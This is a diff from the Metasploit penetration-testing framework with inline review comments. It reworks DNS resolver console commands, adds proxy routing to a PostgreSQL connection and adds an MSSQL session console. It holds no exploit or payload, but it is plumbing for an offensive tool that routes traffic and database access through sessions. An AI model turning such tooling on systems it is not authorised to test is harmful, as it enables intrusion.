'Columns' => ['Hostname', 'IP Address', 'Rule #', 'Rule', 'Resolver', 'Comm channel'],
|
||||
'SortIndex' => -1,
|
||||
'WordWrap' => false
|
||||
)
|
||||
names.each do |name|
|
||||
upstream_rule = resolver.upstream_rules.find { |ur| ur.matches_name?(name) }
|
||||
if upstream_rule.nil?
|
||||
tbl << [name, '[Failed To Resolve]', '', '', '', '']
|
||||
next
|
||||
end
|
||||
|
||||
upstream_rule_idx = resolver.upstream_rules.index(upstream_rule) + 1
|
||||
|
||||
begin
|
||||
result = resolver.query(name, query_type)
|
||||
rescue NoResponseError
|
||||
tbl = append_resolver_cells!(tbl, upstream_rule, prefix: [name, '[Failed To Resolve]'], index: upstream_rule_idx)
|
||||
else
|
||||
if result.answer.empty?
|
||||
tbl = append_resolver_cells!(tbl, upstream_rule, prefix: [name, '[Failed To Resolve]'], index: upstream_rule_idx)
|
||||
else
|
||||
result.answer.select do |answer|
|
||||
answer.type == query_type
|
||||
end.map(&:address).map(&:to_s).each do |address|
|
||||
tbl = append_resolver_cells!(tbl, upstream_rule, prefix: [name, address], index: upstream_rule_idx)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
print(tbl.to_s)
|
||||
end
|
||||
|
||||
def resolve_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{RESOLVE_USAGE}"
|
||||
print_line @@resolve_opts.usage
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Resolve a hostname to an IPv6 address using the current configuration"
|
||||
print_line " dns resolve -f IPv6 www.metasploit.com"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
@@ -237,52 +449,225 @@ class DNS
|
||||
remove_ids = []
|
||||
@@remove_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when '-i'
|
||||
raise ::ArgumentError.new("Not a valid number: #{val}") unless val =~ /^\d+$/
|
||||
remove_ids << val.to_i
|
||||
when '-i', '--index'
|
||||
raise ::ArgumentError.new("Not a valid index: #{val}") unless val.to_i > 0
|
||||
|
||||
remove_ids << val.to_i - 1
|
||||
end
|
||||
end
|
||||
|
||||
removed = driver.framework.dns_resolver.remove_ids(remove_ids)
|
||||
difference = remove_ids.difference(removed.map { |entry| entry[:id] })
|
||||
print_warning("Some entries were not removed: #{difference.join(', ')}") unless difference.empty?
|
||||
if removed.length > 0
|
||||
print_good("#{removed.length} DNS #{removed.length > 1 ? 'entries' : 'entry'} removed")
|
||||
print_dns_set('Deleted entries', removed)
|
||||
if remove_ids.empty?
|
||||
raise ::ArgumentError.new('At least one index to remove must be provided')
|
||||
end
|
||||
|
||||
removed = resolver.remove_ids(remove_ids)
|
||||
print_warning('Some entries were not removed') unless removed.length == remove_ids.length
|
||||
if removed.length > 0
|
||||
print_good("#{removed.length} DNS #{removed.length > 1 ? 'entries' : 'entry'} removed")
|
||||
print_dns_set('Deleted entries', removed, ids: [nil] * removed.length)
|
||||
end
|
||||
end
|
||||
|
||||
def remove_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{REMOVE_USAGE}"
|
||||
print_line(@@remove_opts.usage)
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Delete the DNS resolution rule #3"
|
||||
print_line " dns remove -i 3"
|
||||
print_line
|
||||
print_line " Delete multiple rules in one command"
|
||||
print_line " dns remove -i 3 -i 4 -i 5"
|
||||
print_line
|
||||
end
|
||||
|
||||
def remove_static_dns(*args)
|
||||
if args.length < 1
|
||||
raise ::ArgumentError.new('A hostname must be provided')
|
||||
end
|
||||
|
||||
hostname = args.shift
|
||||
if !Rex::Proto::DNS::StaticHostnames.is_valid_hostname?(hostname)
|
||||
raise ::ArgumentError.new("Invalid hostname: #{hostname}")
|
||||
end
|
||||
|
||||
ip_addresses = args
|
||||
if ip_addresses.empty?
|
||||
ip_addresses = resolver.static_hostnames.get(hostname, Dnsruby::Types::A) + resolver.static_hostnames.get(hostname, Dnsruby::Types::AAAA)
|
||||
if ip_addresses.empty?
|
||||
print_status("There are no definitions for hostname: #{hostname}")
|
||||
end
|
||||
elsif (ip_address = ip_addresses.find { |ip| !Rex::Socket.is_ip_addr?(ip) })
|
||||
raise ::ArgumentError.new("Invalid IP address: #{ip_address}")
|
||||
end
|
||||
|
||||
ip_addresses.each do |ip_address|
|
||||
resolver.static_hostnames.delete(hostname, ip_address)
|
||||
print_status("Removed static hostname mapping #{hostname} to #{ip_address}")
|
||||
end
|
||||
end
|
||||
|
||||
def remove_static_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{REMOVE_STATIC_USAGE}"
|
||||
print_line
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Remove all IPv4 and IPv6 addresses for 'localhost'"
|
||||
print_line " dns remove-static localhost"
|
||||
print_line
|
||||
end
|
||||
|
||||
def reset_config_dns(*args)
|
||||
add_system_resolver = false
|
||||
should_confirm = true
|
||||
@@reset_config_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when '--system'
|
||||
add_system_resolver = true
|
||||
when '-y', '--yes'
|
||||
should_confirm = false
|
||||
end
|
||||
end
|
||||
|
||||
if should_confirm
|
||||
print("Are you sure you want to reset the DNS configuration? [y/N]: ")
|
||||
response = gets.downcase.chomp
|
||||
return unless response =~ /^y/i
|
||||
end
|
||||
|
||||
resolver.reinit
|
||||
print_status('The DNS configuration has been reset')
|
||||
|
||||
if add_system_resolver
|
||||
# if the user requested that we add the system resolver
|
||||
system_resolver = Rex::Proto::DNS::UpstreamResolver.create_system
|
||||
# first find the default, catch-all rule
|
||||
default_rule = resolver.upstream_rules.find { |ur| ur.matches_all? }
|
||||
if default_rule.nil?
|
||||
resolver.add_upstream_rule([ system_resolver ])
|
||||
else
|
||||
# if the first resolver is for static hostnames, insert after that one
|
||||
if default_rule.resolvers.first&.type == Rex::Proto::DNS::UpstreamResolver::Type::STATIC
|
||||
index = 1
|
||||
else
|
||||
index = 0
|
||||
end
|
||||
default_rule.resolvers.insert(index, system_resolver)
|
||||
end
|
||||
end
|
||||
|
||||
print_dns
|
||||
|
||||
if ENV['PROXYCHAINS_CONF_FILE'] && !add_system_resolver
|
||||
print_warning('Detected proxychains but the system resolver was not added')
|
||||
end
|
||||
end
|
||||
|
||||
def reset_config_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{RESET_CONFIG_USAGE}"
|
||||
print_line @@reset_config_opts.usage
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Reset the configuration without prompting to confirm"
|
||||
print_line " dns reset-config --yes"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Delete all cached DNS answers
|
||||
#
|
||||
def flush_cache_dns
|
||||
resolver.cache.flush
|
||||
print_good('DNS cache flushed')
|
||||
end
|
||||
|
||||
#
|
||||
# Delete all user-configured DNS settings
|
||||
#
|
||||
def purge_dns
|
||||
driver.framework.dns_resolver.purge
|
||||
print_good('DNS entries purged')
|
||||
def flush_entries_dns
|
||||
resolver.flush
|
||||
print_good('DNS entries flushed')
|
||||
end
|
||||
|
||||
def flush_static_dns
|
||||
resolver.static_hostnames.flush
|
||||
print_good('DNS static hostnames flushed')
|
||||
end
|
||||
|
||||
#
|
||||
# Display the user-configured DNS settings
|
||||
#
|
||||
def print_dns
|
||||
results = driver.framework.dns_resolver.nameserver_entries
|
||||
columns = ['ID','Rule(s)', 'DNS Server', 'Comm channel']
|
||||
print_dns_set('Custom nameserver rules', results[0])
|
||||
default_domain = 'N/A'
|
||||
if resolver.defname? && resolver.domain.present?
|
||||
default_domain = resolver.domain
|
||||
end
|
||||
print_line("Default search domain: #{default_domain}")
|
||||
|
||||
# Default nameservers don't include a rule
|
||||
columns = ['ID', 'DNS Server', 'Comm channel']
|
||||
print_dns_set('Default nameservers', results[1])
|
||||
searchlist = resolver.searchlist
|
||||
case searchlist.length
|
||||
when 0
|
||||
print_line('Default search list: N/A')
|
||||
when 1
|
||||
print_line("Default search list: #{searchlist.first}")
|
||||
else
|
||||
print_line('Default search list:')
|
||||
searchlist.each do |entry|
|
||||
print_line(" * #{entry}")
|
||||
end
|
||||
end
|
||||
print_line("Current cache size: #{resolver.cache.records.length}")
|
||||
|
||||
print_line('No custom DNS nameserver entries configured') if results[0].length + results[1].length == 0
|
||||
upstream_rules = resolver.upstream_rules
|
||||
print_dns_set('Resolver rule entries', upstream_rules, ids: (1..upstream_rules.length).to_a)
|
||||
if upstream_rules.empty?
|
||||
print_line
|
||||
print_error('No DNS nameserver entries configured')
|
||||
end
|
||||
|
||||
tbl = Table.new(
|
||||
Table::Style::Default,
|
||||
'Header' => 'Static hostnames',
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => ['Hostname', 'IPv4 Address', 'IPv6 Address'],
|
||||
'SortIndex' => -1,
|
||||
'WordWrap' => false
|
||||
)
|
||||
resolver.static_hostnames.each do |hostname, addresses|
|
||||
ipv4_addresses = addresses.fetch(Dnsruby::Types::A, [])
|
||||
ipv6_addresses = addresses.fetch(Dnsruby::Types::AAAA, [])
|
||||
0.upto([ipv4_addresses.length, ipv6_addresses.length].max - 1) do |idx|
|
||||
tbl << [idx == 0 ? hostname : TABLE_INDENT, ipv4_addresses[idx], ipv6_addresses[idx]]
|
||||
end
|
||||
end
|
||||
print_line(tbl.to_s)
|
||||
if resolver.static_hostnames.empty?
|
||||
print_line('No static hostname entries are configured')
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
SPECIAL_RESOLVERS = [
|
||||
Rex::Proto::DNS::UpstreamResolver::Type::BLACK_HOLE.to_s.downcase,
|
||||
Rex::Proto::DNS::UpstreamResolver::Type::SYSTEM.to_s.downcase
|
||||
].freeze
|
||||
|
||||
# XXX: By default rex-text tables strip preceding whitespace:
|
||||
# https://github.com/rapid7/rex-text/blob/1a7b63993
|
||||
# ca62fd9102665d6986f918ae42cae244e/lib/rex/text/table.rb#L221-L222
|
||||
# So use https://en.wikipedia.org/wiki/Non-breaking_space as a workaround for now. A change should exist in Rex-Text to support this requirement
|
||||
TABLE_INDENT = "\xc2\xa0\xc2\xa0\\_ ".freeze
|
||||
|
||||
#
|
||||
# Get user-friendly text for displaying the session that this entry would go through
|
||||
#
|
||||
def prettify_comm(comm, dns_server)
|
||||
if comm.nil?
|
||||
channel = Rex::Socket::SwitchBoard.best_comm(dns_server)
|
||||
def prettify_comm(comm, upstream_resolver)
|
||||
if !Rex::Socket.is_ip_addr?(upstream_resolver.destination)
|
||||
'N/A'
|
||||
elsif comm.nil?
|
||||
channel = Rex::Socket::SwitchBoard.best_comm(upstream_resolver.destination)
|
||||
if channel.nil?
|
||||
nil
|
||||
else
|
||||
@@ -297,32 +682,40 @@ class DNS
|
||||
end
|
||||
end
|
||||
|
||||
def print_dns_set(heading, result_set)
|
||||
def print_dns_set(heading, result_set, ids: [])
|
||||
return if result_set.length == 0
|
||||
if result_set[0][:wildcard_rules].any?
|
||||
columns = ['ID', 'Rules(s)', 'DNS Server', 'Comm channel']
|
||||
else
|
||||
columns = ['ID', 'DNS Server', 'Commm channel']
|
||||
end
|
||||
columns = ['#', 'Rule', 'Resolver', 'Comm channel']
|
||||
|
||||
tbl = Table.new(
|
||||
Table::Style::Default,
|
||||
'Header' => heading,
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => columns
|
||||
)
|
||||
result_set.each do |hash|
|
||||
if columns.size == 4
|
||||
tbl << [hash[:id], hash[:wildcard_rules].join(','), hash[:dns_server], prettify_comm(hash[:comm], hash[:dns_server])]
|
||||
else
|
||||
tbl << [hash[:id], hash[:dns_server], prettify_comm(hash[:comm], hash[:dns_server])]
|
||||
end
|
||||
Table::Style::Default,
|
||||
'Header' => heading,
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => columns,
|
||||
'SortIndex' => -1,
|
||||
'WordWrap' => false
|
||||
)
|
||||
result_set.each_with_index do |entry, index|
|
||||
tbl = append_resolver_cells!(tbl, entry, index: ids[index])
|
||||
end
|
||||
|
||||
print(tbl.to_s) if tbl.rows.length > 0
|
||||
end
|
||||
|
||||
def append_resolver_cells!(tbl, entry, prefix: [], suffix: [], index: nil)
|
||||
alignment_prefix = prefix.empty? ? [] : (['.'] * prefix.length)
|
||||
|
||||
if entry.resolvers.length == 1
|
||||
tbl << prefix + [index.to_s, entry.wildcard, entry.resolvers.first, prettify_comm(entry.comm, entry.resolvers.first)] + suffix
|
||||
elsif entry.resolvers.length > 1
|
||||
tbl << prefix + [index.to_s, entry.wildcard, '', ''] + suffix
|
||||
entry.resolvers.each do |resolver|
|
||||
tbl << alignment_prefix + ['.', TABLE_INDENT, resolver, prettify_comm(entry.comm, resolver)] + ([''] * suffix.length)
|
||||
end
|
||||
end
|
||||
tbl
|
||||
end
|
||||
|
||||
def resolver
|
||||
self.driver.framework.dns_resolver
|
||||
end
|
||||
@@ -331,4 +724,4 @@ end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
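Review bot: The new index checks in `add_dns` and `remove_dns` (`unless val.to_i > 0`) accept any string that merely starts with a number, because `String#to_i` stops at the first non-digit, so `-i 3abc` or `-i 2-4` is silently taken as 3 or 2. The `remove_dns` code this replaces rejected such input with a regex, and the session check added in the same change is strict (`/\A-?[0-9]+\Z/`), which leaves the index path as the lenient one. On `remove` that means a resolver rule other than the one the operator intended can be deleted, or a rule they believe is gone stays active. I would validate before converting, in both places: `raise ::ArgumentError.new("Not a valid index: #{val}") unless val.to_s.match?(/\A[1-9][0-9]*\z/)`.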
|
||||
@@ -85,7 +85,7 @@ class Driver < Msf::Ui::Driver
|
||||
if Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::DNS_FEATURE)
|
||||
dns_resolver = Rex::Proto::DNS::CachedResolver.new
|
||||
dns_resolver.extend(Rex::Proto::DNS::CustomNameserverProvider)
|
||||
dns_resolver.load_config
|
||||
dns_resolver.load_config if dns_resolver.has_config?
|
||||
|
||||
# Defer loading of modules until paths from opts can be added below
|
||||
framework_create_options = framework_create_options.merge({ 'CustomDnsResolver' => dns_resolver })
|
||||
|
||||
+5
-5
@@ -35,17 +35,17 @@ class MsfAutoload
|
||||
'PowerShell'
|
||||
elsif basename == 'ui' && abspath.end_with?("#{__dir__}/msf/core/module/ui", "#{__dir__}/msf/core/module/ui.rb", "#{__dir__}/rex/post/ui", "#{__dir__}/rex/post/ui.rb", "#{__dir__}/rex/post/meterpreter/extensions/stdapi/ui.rb")
|
||||
'UI'
|
||||
elsif basename == 'mysql' && abspath.end_with?("#{__dir__}/msf/core/exploit/remote/mysql.rb")
|
||||
'MYSQL'
|
||||
elsif basename == 'ssh' && abspath.end_with?("#{__dir__}/rex/proto/ssh")
|
||||
'Ssh'
|
||||
elsif basename == 'http' && abspath.end_with?("#{__dir__}/rex/proto/http")
|
||||
'Http'
|
||||
elsif basename == 'rftransceiver' && abspath.end_with?("#{__dir__}/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb")
|
||||
'RFtransceiver'
|
||||
elsif basename == 'mysql' && abspath.end_with?("#{__dir__}/msf/base/sessions/mysql.rb")
|
||||
'MySQL'
|
||||
else
|
||||
super
|
||||
end
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
@@ -145,7 +145,7 @@ class MsfAutoload
|
||||
'dcerpc_lsa' => 'DCERPC_LSA',
|
||||
'wdbrpc_client' => 'WDBRPC_Client',
|
||||
'sunrpc' => 'SunRPC',
|
||||
'mysql' => 'MYSQL',
|
||||
'mysql' => 'MySQL',
|
||||
'ldap' => 'LDAP',
|
||||
'sqli' => 'SQLi',
|
||||
'dhcp_server' => 'DHCPServer',
|
||||
|
||||
@@ -253,7 +253,7 @@ module Net # :nodoc:
|
||||
# #=> ["example.com","a.example.com","b.example.com"]
|
||||
#
|
||||
def searchlist
|
||||
@config[:searchlist].inspect
|
||||
@config[:searchlist].deep_dup
|
||||
end
|
||||
|
||||
# Set the resolver searchlist.
|
||||
@@ -350,7 +350,7 @@ module Net # :nodoc:
|
||||
# Return a string with the default domain
|
||||
#
|
||||
def domain
|
||||
@config[:domain].inspect
|
||||
@config[:domain].dup
|
||||
end
|
||||
|
||||
# Set the domain for the query
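Review bot: `searchlist` calls `deep_dup` (reading the second of each doubled line as the new side), which is an ActiveSupport core extension rather than core Ruby, and nothing visible in these hunks requires it. If this resolver is ever loaded without ActiveSupport, the getter raises NoMethodError; assuming the searchlist is always an array of strings, `@config[:searchlist].map(&:dup)` gives the same copy without the dependency. In `domain`, replacing `.inspect` with `.dup` changes the return value from a quoted string to the raw value, which is presumably nil when no domain is configured. The comment `Return a string with the default domain` should say that a copy is returned and that it may be nil. Both method bodies are complete in the hunks, but the rest of the class is not shown.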
|
||||
|
||||
@@ -21,27 +21,31 @@ end
|
||||
class DnsTimeout # :nodoc: all
|
||||
|
||||
include SecondsHandle
|
||||
|
||||
|
||||
def initialize(seconds)
|
||||
if seconds.is_a? Numeric and seconds >= 0
|
||||
@timeout = seconds
|
||||
else
|
||||
raise DnsTimeoutArgumentError, "Invalid value for tcp timeout"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def to_i
|
||||
@timeout
|
||||
end
|
||||
|
||||
def to_s
|
||||
if @timeout == 0
|
||||
if @timeout == 0
|
||||
@output
|
||||
else
|
||||
@timeout.to_s
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def pretty_to_s
|
||||
transform(@timeout)
|
||||
end
|
||||
|
||||
|
||||
def timeout
|
||||
unless block_given?
|
||||
raise DnsTimeoutArgumentError, "Block required but missing"
|
||||
|
||||
@@ -56,12 +56,12 @@ class Connection
|
||||
end
|
||||
end
|
||||
|
||||
def initialize(database, user, password=nil, uri = nil)
|
||||
def initialize(database, user, password=nil, uri = nil, proxies = nil)
|
||||
uri ||= DEFAULT_URI
|
||||
|
||||
@transaction_status = nil
|
||||
@params = { 'username' => user, 'database' => database }
|
||||
establish_connection(uri)
|
||||
establish_connection(uri, proxies)
|
||||
|
||||
# Check if the password supplied is a Postgres-style md5 hash
|
||||
md5_hash_match = password.match(/^md5([a-f0-9]{32})$/)
|
||||
@@ -121,6 +121,14 @@ class Connection
|
||||
end
|
||||
end
|
||||
|
||||
def address
|
||||
@conn.peerhost
|
||||
end
|
||||
|
||||
def port
|
||||
@conn.peerport
|
||||
end
|
||||
|
||||
def close
|
||||
raise "connection already closed" if @conn.nil?
|
||||
@conn.shutdown
|
||||
@@ -235,14 +243,15 @@ class Connection
|
||||
|
||||
# tcp://localhost:5432
|
||||
# unix:/tmp/.s.PGSQL.5432
|
||||
def establish_connection(uri)
|
||||
def establish_connection(uri, proxies)
|
||||
u = URI.parse(uri)
|
||||
case u.scheme
|
||||
when 'tcp'
|
||||
@conn = Rex::Socket.create(
|
||||
'PeerHost' => (u.host || DEFAULT_HOST).gsub(/[\[\]]/, ''), # Strip any brackets off (IPv6)
|
||||
'PeerPort' => (u.port || DEFAULT_PORT),
|
||||
'proto' => 'tcp'
|
||||
'proto' => 'tcp',
|
||||
'Proxies' => proxies
|
||||
)
|
||||
when 'unix'
|
||||
@conn = UNIXSocket.new(u.path)
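Review bot: The `address` and `port` accessors call `@conn.peerhost` and `@conn.peerport`, but `establish_connection` can also set `@conn` to a plain `UNIXSocket` for `unix:` URIs, and that stdlib class has no such methods, so both raise NoMethodError on a unix-socket connection. A guard such as `@conn.respond_to?(:peerhost) ? @conn.peerhost : nil`, or a comment stating that the accessors are TCP-only, would make the contract explicit. The `proxies` argument is also dropped without notice on the `unix` branch; if a caller supplies proxies expecting all traffic to be routed through them, a comment or an explicit error there would avoid surprises. The bodies of `initialize` and `establish_connection` continue outside the hunks.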
|
||||
|
||||
+4
-4
@@ -98,15 +98,15 @@ require 'rex/sslscan/result'
|
||||
require 'rex/version'
|
||||
|
||||
# Overload the Kernel.sleep() function to be thread-safe
|
||||
Kernel.class_eval("
|
||||
Kernel.class_eval(<<-EOF, __FILE__, __LINE__ + 1)
|
||||
def sleep(seconds=nil)
|
||||
Rex::ThreadSafe.sleep(seconds)
|
||||
end
|
||||
")
|
||||
EOF
|
||||
|
||||
# Overload the Kernel.select function to be thread-safe
|
||||
Kernel.class_eval("
|
||||
Kernel.class_eval(<<-EOF, __FILE__, __LINE__ + 1)
|
||||
def select(rfd = nil, wfd = nil, efd = nil, to = nil)
|
||||
Rex::ThreadSafe.select(rfd, wfd, efd, to)
|
||||
end
|
||||
")
|
||||
EOF
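Review bot: Both `Kernel.class_eval` calls still evaluate a string; passing `__FILE__, __LINE__ + 1` makes backtraces point at this file, but the string form is not needed here. The block form, `Kernel.class_eval do … end` around the same `def sleep` and `def select` bodies, defines the same methods without string evaluation and lets linters and editors parse them. If the string form is kept deliberately, a one-line comment saying why would help, and `<<~EOF` would allow the heredoc body to be indented with the surrounding code.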
|
||||
|
||||
@@ -5,6 +5,7 @@ require 'rex/post/meterpreter'
|
||||
require 'rex/post/smb'
|
||||
require 'rex/post/postgresql'
|
||||
require 'rex/post/mysql'
|
||||
require 'rex/post/mssql'
|
||||
|
||||
module Rex::Post
|
||||
|
||||
|
||||
@@ -0,0 +1,3 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/post/mssql/ui'
|
||||
@@ -0,0 +1,3 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/post/mssql/ui/console'
|
||||
@@ -0,0 +1,148 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# This class provides a shell driven interface to the MSSQL client API.
|
||||
#
|
||||
###
|
||||
class Console
|
||||
include Rex::Ui::Text::DispatcherShell
|
||||
|
||||
# Dispatchers
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher'
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher/core'
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher/client'
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher/modules'
|
||||
|
||||
#
|
||||
# Initialize the MSSQL console.
|
||||
#
|
||||
# @param [Msf::Sessions::MSSQL] session
|
||||
def initialize(session, opts={})
|
||||
# The mssql client context
|
||||
self.session = session
|
||||
self.client = session.client
|
||||
envchange = ::Rex::Proto::MSSQL::ClientMixin::ENVCHANGE
|
||||
prompt = "%undMSSQL @ #{client.sock.peerinfo} (#{client.initial_info_for_envchange(envchange: envchange::DATABASE)[:new]})%clr"
|
||||
history_manager = Msf::Config.mssql_session_history
|
||||
super(prompt, '>', history_manager, nil, :mssql)
|
||||
|
||||
# Queued commands array
|
||||
self.commands = []
|
||||
|
||||
# Point the input/output handles elsewhere
|
||||
reset_ui
|
||||
|
||||
enstack_dispatcher(::Rex::Post::MSSQL::Ui::Console::CommandDispatcher::Core)
|
||||
enstack_dispatcher(::Rex::Post::MSSQL::Ui::Console::CommandDispatcher::Client)
|
||||
enstack_dispatcher(::Rex::Post::MSSQL::Ui::Console::CommandDispatcher::Modules)
|
||||
|
||||
# Set up logging to whatever logsink 'core' is using
|
||||
if ! $dispatcher['mssql']
|
||||
$dispatcher['mssql'] = $dispatcher['core']
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Called when someone wants to interact with the mssql client. It's
|
||||
# assumed that init_ui has been called prior.
|
||||
#
|
||||
# @param [Proc] block
|
||||
# @return [Integer]
|
||||
def interact(&block)
|
||||
# Run queued commands
|
||||
commands.delete_if do |ent|
|
||||
run_single(ent)
|
||||
true
|
||||
end
|
||||
|
||||
# Run the interactive loop
|
||||
run do |line|
|
||||
# Run the command
|
||||
run_single(line)
|
||||
|
||||
# If a block was supplied, call it, otherwise return false
|
||||
if block
|
||||
block.call
|
||||
else
|
||||
false
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Queues a command to be run when the interactive loop is entered.
|
||||
#
|
||||
# @param [Object] cmd
|
||||
# @return [Object]
|
||||
def queue_cmd(cmd)
|
||||
self.commands << cmd
|
||||
end
|
||||
|
||||
#
|
||||
# Runs the specified command wrapper in something to catch meterpreter
|
||||
# exceptions.
|
||||
#
|
||||
# @param [Object] dispatcher
|
||||
# @param [Object] method
|
||||
# @param [Object] arguments
|
||||
# @return [FalseClass]
|
||||
def run_command(dispatcher, method, arguments)
|
||||
begin
|
||||
super
|
||||
rescue ::Timeout::Error
|
||||
log_error('Operation timed out.')
|
||||
rescue ::Rex::InvalidDestination => e
|
||||
log_error(e.message)
|
||||
rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
|
||||
self.session.kill
|
||||
rescue ::StandardError => e
|
||||
log_error("Error running command #{method}: #{e.class} #{e}")
|
||||
elog(e)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Logs that an error occurred and persists the callstack.
|
||||
#
|
||||
# @param [Object] msg
|
||||
# @return [Object]
|
||||
def log_error(msg)
|
||||
print_error(msg)
|
||||
|
||||
elog(msg, 'MSSQL')
|
||||
|
||||
dlog("Call stack:\n#{$@.join("\n")}", 'mssql')
|
||||
end
|
||||
|
||||
# @return [Msf::Sessions::MSSQL]
|
||||
attr_reader :session
|
||||
|
||||
# @return [MSSQL::Client]
|
||||
attr_reader :client
|
||||
|
||||
# @return [String]
|
||||
def database_name
|
||||
session.client.mssql_query('SELECT DB_NAME();')[:rows][0][0]
|
||||
end
|
||||
|
||||
# @param [Object] val
|
||||
# @return [String]
|
||||
def format_prompt(val)
|
||||
prompt = "%undMSSQL @ #{client.sock.peerinfo} (#{database_name})%clr > "
|
||||
substitute_colors(prompt, true)
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
attr_writer :session, :client # :nodoc:
|
||||
attr_accessor :commands # :nodoc:
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
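Review bot: `format_prompt` calls `database_name`, which sends `SELECT DB_NAME();` to the server and indexes `[:rows][0][0]` unchecked, so every prompt redraw costs a round trip and a dropped connection or an error reply raises from the prompt renderer instead of going through `run_command`'s rescue chain. Caching the name (the constructor already reads it from `initial_info_for_envchange`) or at least using `rows&.dig(0, 0)` with a fallback string would keep the prompt from failing. In `log_error`, `elog(msg, 'MSSQL')` uses a different log source than the `'mssql'` passed to `dlog` and registered in `$dispatcher['mssql']`, which presumably sends the two messages to different sinks. `$@.join` also raises when `log_error` is called with no exception in flight; `Array($@).join("\n")` avoids that. The `run_command` comment still refers to meterpreter exceptions and should name the MSSQL session.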
|
||||
@@ -0,0 +1,113 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/ui/text/dispatcher_shell'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# Base class for all command dispatchers within the MSSQL console user interface.
|
||||
#
|
||||
###
|
||||
module Console::CommandDispatcher
|
||||
include Msf::Ui::Console::CommandDispatcher::Session
|
||||
|
||||
#
|
||||
# Initializes an instance of the core command set using the supplied session and client
|
||||
# for interactivity.
|
||||
#
|
||||
# @param [Rex::Post::MSSQL::Ui::Console] console
|
||||
def initialize(console)
|
||||
super
|
||||
@msf_loaded = nil
|
||||
@filtered_commands = []
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the MSSQL client context.
|
||||
#
|
||||
# @return [MSSQL::Client]
|
||||
def client
|
||||
console = shell
|
||||
console.client
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the MSSQL session context.
|
||||
#
|
||||
# @return [Msf::Sessions::MSSQL]
|
||||
def session
|
||||
console = shell
|
||||
console.session
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the commands that meet the requirements
|
||||
#
|
||||
# @param [Object] all
|
||||
# @param [Object] reqs
|
||||
# @return [Object]
|
||||
def filter_commands(all, reqs)
|
||||
all.delete_if do |cmd, _desc|
|
||||
if reqs[cmd]&.any? { |req| !client.commands.include?(req) }
|
||||
@filtered_commands << cmd
|
||||
true
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# @param [Object] cmd
|
||||
# @param [Object] line
|
||||
# @return [Symbol, nil]
|
||||
def unknown_command(cmd, line)
|
||||
if @filtered_commands.include?(cmd)
|
||||
print_error("The \"#{cmd}\" command is not supported by this session type (#{session.session_type})")
|
||||
return :handled
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
# Return the subdir of the `documentation/` directory that should be used
|
||||
# to find usage documentation
|
||||
#
|
||||
# @return [String]
|
||||
def docs_dir
|
||||
::File.join(super, 'mssql_session')
|
||||
end
|
||||
|
||||
#
|
||||
# Returns true if the client has a framework object.
|
||||
#
|
||||
# Used for firing framework session events
|
||||
#
|
||||
# @return [TrueClass, FalseClass]
|
||||
def msf_loaded?
|
||||
return @msf_loaded unless @msf_loaded.nil?
|
||||
|
||||
# if we get here we must not have initialized yet
|
||||
|
||||
@msf_loaded = !session.framework.nil?
|
||||
@msf_loaded
|
||||
end
|
||||
|
||||
#
|
||||
# Log that an error occurred.
|
||||
#
|
||||
# @param [Object] msg
|
||||
# @return [Object]
|
||||
def log_error(msg)
|
||||
print_error(msg)
|
||||
|
||||
elog(msg, 'mssql')
|
||||
|
||||
dlog("Call stack:\n#{$ERROR_POSITION.join("\n")}", 'mssql')
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
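Review bot: `log_error` reads `$ERROR_POSITION`, which is an alias for `$@` only after `require 'English'`, and this file requires only `rex/ui/text/dispatcher_shell`; unless another file has already loaded it, the global is nil and `.join` raises inside the error logger. The value is also nil whenever `log_error` is called with no exception in flight. Adding `require 'English'` at the top and writing `Array($ERROR_POSITION).join("\n")` covers both cases. The header comment calls this a base class although it is declared as a `module`, and the `filter_commands` doc could state that it mutates and returns the hash it is given.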
|
||||
